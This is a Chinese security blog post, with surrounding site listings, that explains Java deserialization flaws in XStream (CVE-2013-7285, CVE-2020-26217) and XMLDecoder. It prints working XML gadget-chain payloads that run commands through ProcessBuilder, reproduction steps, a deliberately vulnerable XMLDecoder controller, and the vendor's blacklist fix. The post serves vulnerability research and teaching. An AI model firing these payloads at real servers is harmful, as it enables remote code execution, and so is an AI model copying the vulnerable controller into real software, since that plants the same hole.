各种反序列化(XStream/XMLDecoder)

最新推荐文章于 2024-08-31 22:56:09 发布
最新推荐文章于 2024-08-31 22:56:09 发布
阅读量3.3k 收藏 1
点赞数
分类专栏: java 安全 Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/104893593
版权
安全 同时被 3 个专栏收录
264 篇文章 9 订阅
订阅专栏
Web
220 篇文章 7 订阅
订阅专栏
java
213 篇文章 3 订阅
订阅专栏

XStream反序列化原理

XStream将对象和xml字符串之间进行转换。

Object <=> XML字符串

XStream#toXML(Object o)    // 对象=> xml
XStream#fromXML(FileInputStream xml)    // xml => 对象

在这里插入图片描述

[CVE-2013-7285]XStream反序列化漏洞

影响范围

1.4.x<=1.4.6或1.4.10。

漏洞描述

Xstream API versions up to 1.4.6 and version 1.4.10, if the security framework has not been initialized, may allow a remote attacker to run arbitrary shell commands by manipulating the processed input stream when unmarshaling XML or any supported format. e.g. JSON.

原理

XStream是自己实现的一套序列化和反序列化机制,所以跟Java原生的反序列化有所区别。

XStream反序列化漏洞的存在是因为XStream支持一个名为DynamicProxyConverter的转换器,该转换器可以将XML中dynamic-proxy标签内容转换成动态代理类对象,而当程序调用了dynamic-proxy标签内的interface标签指向的接口类声明的方法时,就会通过动态代理机制代理访问dynamic-proxy标签内handler标签指定的类方法;利用这个机制,攻击者可以构造恶意的XML内容,即dynamic-proxy标签内的handler标签指向如EventHandler类这种可实现任意函数反射调用的恶意类、interface标签指向目标程序必然会调用的接口类方法;最后当攻击者从外部输入该恶意XML内容后即可触发反序列化漏洞、达到任意代码执行的目的。

PoC

执行多条命令:

<sorted-set>
    <string>foo</string>
    <dynamic-proxy>
        <interface>java.lang.Comparable</interface>
        <handler class="java.beans.EventHandler">
            <target class="java.lang.ProcessBuilder">
                <command>
                    <string>cmd</string>
                    <string>/C</string>
                    <string>calc</string>
                </command>
            </target>
            <action>start</action>
        </handler>
    </dynamic-proxy>
</sorted-set>

在这里插入图片描述

参考

另外一poc,参考:
https://blog.csdn.net/caiqiiqi/article/details/86990876

<map>
 <entry>
   <jdk.nashorn.internal.objects.NativeString>
     <flags>0</flags>
     <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
       <dataHandler>
         <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
           <is class="javax.crypto.CipherInputStream">
             <cipher class="javax.crypto.NullCipher">
               <initialized>false</initialized>
               <opmode>0</opmode>
               <serviceIterator class="javax.imageio.spi.FilterIterator">
                 <iter class="javax.imageio.spi.FilterIterator">
                   <iter class="java.util.Collections$EmptyIterator"/>
                   <next class="java.lang.ProcessBuilder">
                     <command>
                       <string>calc</string>
                     </command>
                     <redirectErrorStream>false</redirectErrorStream>
                   </next>
                 </iter>
                 <filter class="javax.imageio.ImageIO$ContainsFilter">
                   <method>
                     <class>java.lang.ProcessBuilder</class>
                     <name>start</name>
                     <parameter-types/>
                   </method>
                   <name>foo</name>
                 </filter>
                 <next class="string">foo</next>
               </serviceIterator>
               <lock/>
             </cipher>
             <input class="java.lang.ProcessBuilder$NullInputStream"/>
             <ibuffer></ibuffer>
             <done>false</done>
             <ostart>0</ostart>
             <ofinish>0</ofinish>
             <closed>false</closed>
           </is>
           <consumed>false</consumed>
         </dataSource>
         <transferFlavors/>
       </dataHandler>
       <dataLen>0</dataLen>
     </value>
   </jdk.nashorn.internal.objects.NativeString>
   <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
 </entry>
 </map>

[CVE-2020-26217]XStream 远程代码执行漏洞

参考:
http://x-stream.github.io/CVE-2020-26217.html
https://vas.riskivy.com/vuln-detail?id=65

影响范围:
≤ 1.4.13

官方介绍说是:

reported originally as CVE-2017-9805 for Struts’ XStream Plugin

在pom.xml里加上这个:

        <dependency>
            <groupId>com.thoughtworks.xstream</groupId>
            <artifactId>xstream</artifactId>
            <version>1.4.13</version>
        </dependency>

然后启动项目。

<map>
  <entry>
    <jdk.nashorn.internal.objects.NativeString>
      <flags>0</flags>
      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
        <dataHandler>
          <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
            <contentType>text/plain</contentType>
            <is class='java.io.SequenceInputStream'>
              <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
                <iterator class='javax.imageio.spi.FilterIterator'>
                  <iter class='java.util.ArrayList$Itr'>
                    <cursor>0</cursor>
                    <lastRet>-1</lastRet>
                    <expectedModCount>1</expectedModCount>
                    <outer-class>
                      <java.lang.ProcessBuilder>
                        <command>
                          <string>calc</string>
                        </command>
                      </java.lang.ProcessBuilder>
                    </outer-class>
                  </iter>
                  <filter class='javax.imageio.ImageIO$ContainsFilter'>
                    <method>
                      <class>java.lang.ProcessBuilder</class>
                      <name>start</name>
                      <parameter-types/>
                    </method>
                    <name>start</name>
                  </filter>
                  <next/>
                </iterator>
                <type>KEYS</type>
              </e>
              <in class='java.io.ByteArrayInputStream'>
                <buf></buf>
                <pos>0</pos>
                <mark>0</mark>
                <count>0</count>
              </in>
            </is>
            <consumed>false</consumed>
          </dataSource>
          <transferFlavors/>
        </dataHandler>
        <dataLen>0</dataLen>
      </value>
    </jdk.nashorn.internal.objects.NativeString>
    <string>test</string>
  </entry>
</map>

在1.4.13版本使用之前的javax.crypto.CipherInputStream
在这里插入图片描述
抛出这个异常:

com.thoughtworks.xstream.security.ForbiddenClassException

之前的java.beans.EventHandler也不行了。
Tips:
为了让报错结果好看一些,可以加上这个Accept:

Accept: text/html,application/xhtml+xml,application/xml

看修复方法,貌似还是继续黑名单:

xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter" });
xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class });

pom.xml里更新xstream版本到1.4.14,
发现java.lang.ProcessBuilder也被加到了黑名单里。
在这里插入图片描述

XMLDecoder反序列化

参考:
https://blog.csdn.net/SKI_12/article/details/85058040
深入分析原理参考:
WebLogic 安全研究报告

PoC
<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0_131" class="java.beans.XMLDecoder">
	<object class="java.lang.ProcessBuilder">
		<array class="java.lang.String" length="1">
			<void index="0">
				<string>calc</string>
			</void>
		</array>
		<void method="start" />
	</object>
</java>

实际测试发现不加version和class属性也可以成功。如果要使用多个参数的payload,需要将array标签的length字段设置为具体长度即可。
在这里插入图片描述
对应的漏洞代码:

@RestController
public class XmlDecoderRCE {

        /**
         * @author shadowsock5 @2020-03-16
         */
        @PostMapping("/XmlDecoder")
        public String parseXml(HttpServletRequest request) throws Exception{
            InputStream in = request.getInputStream();
            XMLDecoder d = new XMLDecoder(in);
            Object result = d.readObject(); //Deserialization happen here
            return "xstream";
        }
}
caiqiiqi
关注
专栏目录
web安全渗透测试十大常规项(一):web渗透测试之JAVA反序列化
HACKONE的博客
06-16 144
反序列化是将字节流转换成Java对象的过程,java序列化的数据一般会以标记(ac ed 00 05)开头,base64编码的特征为rO0AB,JAVA常见的序列化和反序列化的方法有JAVA 原生序列化和JSON 类(fastjson、jackson)序列化等。-SnakeYaml:完整的YAML1.1规范Processor,支持Java对象的序列化/反序列化。#Java安全-反序列化-原生序列化类函数。2、泄漏安全(配置密码,AK/SK等)3、漏洞安全(利用类,CVE漏洞等)0、黑盒发现(流量捕获)
初识Java反序列化
m0_71563599的博客
06-04 1629
研究某产品反序列化EXP时,搜集到的POC只有一段16进制字节序列难以利用,遂有下文对Java序列化和反序列化的学习。大致内容如下:序列化和反序列化示例序列化数据组成解构反序列化漏洞形成原理序列化: 将程序运行时所需要的Java对象转化为字节序列并存储在文件系统中,一般为.ser后缀的文件,ObjectOutputStream.writeObject()方法可以将对象序列化。反序列化: 将存储在文件系统的字节序列转化成对象供程序使用,ObjectInputStream.readObject()方法可以将字节
XStream反序列化
Finlinlts的博客
10-01 1729
概述 XStream是Java类库,用来将对象序列化成XML(JSON)或反序列化为对象。XStream在运行时使用Java反射机制对要进行序列化的对象树的结构进行探索,并不需要对对象作出修改。XStream可以序列化内部字段,包括私private和final字段,并且支持非公开类以及内部类。在缺省情况下,XStream不需要配置映射关系,对象和字段将映射为同名XML元素。但是当对象和字段名与XML中的元素名不同时,XStream支持指定别名。XStream支持以方法调用的方式,或是Java标注的方式指定
java xmldecoder_java---- XMLEncoder 和 XMLDecoder 和 xSteam工具使用
weixin_36296864的博客
02-16 244
XMLEncoder:将对象写入XML数据中import org.dom4j.DocumentException;import java.beans.XMLEncoder;import java.io.*;public class Demo{public static void main(String[] args) throws IOException, DocumentException {x...
【java知识】java基础-xstream解析xml
最新发布
wendao76的专栏
08-31 1177
java, xm转换, xml解析, xstream组件
Java 反序列化XStream 反序列化
YJ_12340的博客
06-26 446
XStream 是一个简单的基于 Java 库,Java 对象序列化到 XML,反之亦然(即:可以轻易的将 Java 对象和 XML 文档相互转换)。
java中XMLEncoder与XMLDecoder及xStream工具使用
java编程学习_java基础教程_booyzhang的博客
05-17 1471
根据对象生成XML文档. 使用Java提供的java.beans.XMLEncoder和java.beans.XMLDecoder类。 这是JDK 1.4以后才出现的类 步骤: (1)实例化XML编码器 XMLEncoder xmlEncoder = new XML Encoder(new BufferedOutputStream(new FileOutputStream(new File(“a.xm)”))); (2)输出对象 (3)关闭 代码示例: package com.booy; import c
xstream反序列化
weixin_48776804的博客
06-06 865
xstream反序列化
使用XStream序列化/反序列化对象
11-01
在Java编程中,序列化和反序列化是两个重要的概念,它们主要用于将对象的状态转换为可以存储或传输的形式,然后再恢复这些状态。XStream是一个强大的库,它允许开发者以XML格式进行序列化和反序列化Java对象。在这个...
序列化与反序列化框架介绍(一)
06-30 1178
1.1 序列化原理及常用的序列化介绍 简而言之,序列化就是把对象转化为字节序列的过程,反序列化则是将字节序列转化为对象的过程 1.1.1 解决的问题 1.1.2 序列化算法评价指标 1.2 常用序列化/反序列化实现的前导工作 为了抽象出一个序列化/反序列化通用服务,首先定义序列化/反序列化通用接口: /** * @author pdc */ public interface ISerial...
Java反序列化安全漏洞怎么回事?
Firstlucky77的博客
06-21 953
序列化是让Java对象脱离Java运行环境的一种手段,可以有效的实现多平台之间的通信、对象持久化存储。Java 序列化是指把 Java 对象转换为字节序列的过程便于保存在内存、文件、数据库中,ObjectOutputStream类的 writeObject() 方法可以实现序列化。反序列化是指把字节序列恢复为 Java 对象的过程,ObjectInputStream 类的 readObject() 方法用于反序列化。序列化和反序列化本身并不存在问题。但当输入的反序列化的数据可被用户控制,那么攻击者即可通过构
xstream序列化与反序列化
06-07
xstreamxml与javaBean的互转
java xstream_xstream实现对象的序列化和反序列化(Java)
weixin_34355360的博客
02-16 480
概述最新整理Java方面XML序列化和反序列化的常用工具类,找到了dom4j和xstream。dom4j相对小巧,很好的解读xml;但是对于对象的xml序列化和反序列化,我还是比较喜欢xsteam(ps:个人爱好吧),这里整理xstream的入门基础知识;使用引用maven内容com.thoughtworks.xstreamxstream1.4.8别名配置的方式1、可以通过类注解实现@XStrea...
Xstream反序列化分析(CVE-2021-39149)
zkaqlaoniao的博客
01-04 720
前几个月XStream爆出一堆漏洞,这两天翻了翻,发现这波洞应该是黑名单绕过的最后一波了。因为在最新版的XStream 1.4.18中已经默认开启白名单的安全框架,按照XStream官方补漏洞的习惯,应该不会再接受新的绕过黑名单的漏洞了。
java xml反序列化_用 XStream 序列化/反序列化 XML 为 Java 对象(实例)
weixin_42135462的博客
02-20 266
packageorg.stephencat.test;importcom.thoughtworks.xstream.*;importjava.util.*;/***测试XStream序列化和反序列化*@authorstephen.wjj**/publicclassXStreamTest{/***测试序列化*/publicstaticvoidTestSerializer(){System....
【Java】萌新的XStream反序列化常用api学习笔记
uuzeray的博客
03-13 777
Xstream是一种OXMapping 技术,是用来处理XML文件序列化的框架,在将JavaBean序列化,或将XML文件反序列化的时候,不需要其它辅助类和映射文件,使得XML序列化不再繁索。Xstream也可以将JavaBean序列化成Json或反序列化,使用非常方便。
『Java安全』XStream 1.4-1.4.6&1.4.10反序列化漏洞CVE-2013-7285复现与浅析
Ho1aAs‘s Blog
08-12 1940
# 漏洞简介 当XStream反序列化了一个动态代理类,再调用该动态代理类所声明的接口的方法时,就能够触发任意命令执行 > XStream序列化和反序列化分析:https://ho1aas.blog.csdn.net/article/details/126250860 > 动态代理:https://ho1aas.blog.csdn.net/article/details/121647387 # 影响版本 XStream 1.4-1.4.6、1.4.10............
java---- XMLEncoder 和 XMLDecoder 和 xSteam工具使用
weixin_30451709的博客
04-26 149
XMLEncoder: 将对象写入XML数据中 import org.dom4j.DocumentException; import java.beans.XMLEncoder; import java.io.*; public class Demo{ public static void main(String[] args) throws IOExce...
BBoss与XStream序列化/反序列化性能深度对比分析
本篇报告主要关注Bboss和XStream两种Java库在序列化与反序列化性能上的对比。Bboss和XStream是两个常见的用于数据持久化和XML/JSON转换的框架,它们在不同的数据结构、规模和测试环境下进行性能测试。 首先,Bboss...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值